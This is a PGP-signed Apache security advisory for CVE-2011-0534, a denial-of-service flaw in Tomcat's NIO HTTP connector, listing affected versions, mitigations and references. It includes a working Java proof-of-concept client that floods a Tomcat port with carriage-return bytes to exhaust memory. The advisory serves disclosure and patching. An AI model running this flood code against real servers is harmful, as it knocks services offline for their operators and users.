-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2011-0534 Apache Tomcat DoS vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.6 - - Tomcat 6.0.0 to 6.0.30 Description: Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger an DoS via an OutOfMemoryError. Example (AL2 licensed): package bug50631; import java.io.OutputStream; import java.net.InetSocketAddress; import java.net.Socket; import java.net.SocketAddress; public class FloodClient1 { static final int k_step = 10; static byte[] value = new byte[k_step * 1024]; public static void main(String[] args) throws Exception { int i = 0; while (i < value.length) { value[i++] = 13; } SocketAddress addr = new InetSocketAddress("localhost", 8080); Socket socket = new Socket(); socket.setSoTimeout(0); socket.connect(addr, 0); OutputStream os = socket.getOutputStream(); // InputStream is = socket.getInputStream(); int k = k_step; int m = 0; int k100 = 100; while (m < 2000) { if (k >= k100) { k100 += 100; System.out.print('.'); System.out.flush(); } if (k >= 1024) { m++; k -= 1024; k100 = 100; System.out.println(" " + m + " Mb"); } os.write(value); os.flush(); Thread.sleep(1); k+=k_step; } } } Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to a Tomcat version where this issue is fixed - - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector Credit: The issue was identified by the Tomcat security team. References: https://issues.apache.org/bugzilla/show_bug.cgi?id=50631 http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+ kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2 ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64 S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm niulExg4qtuJplCbEw8k =06CU -----END PGP SIGNATURE-----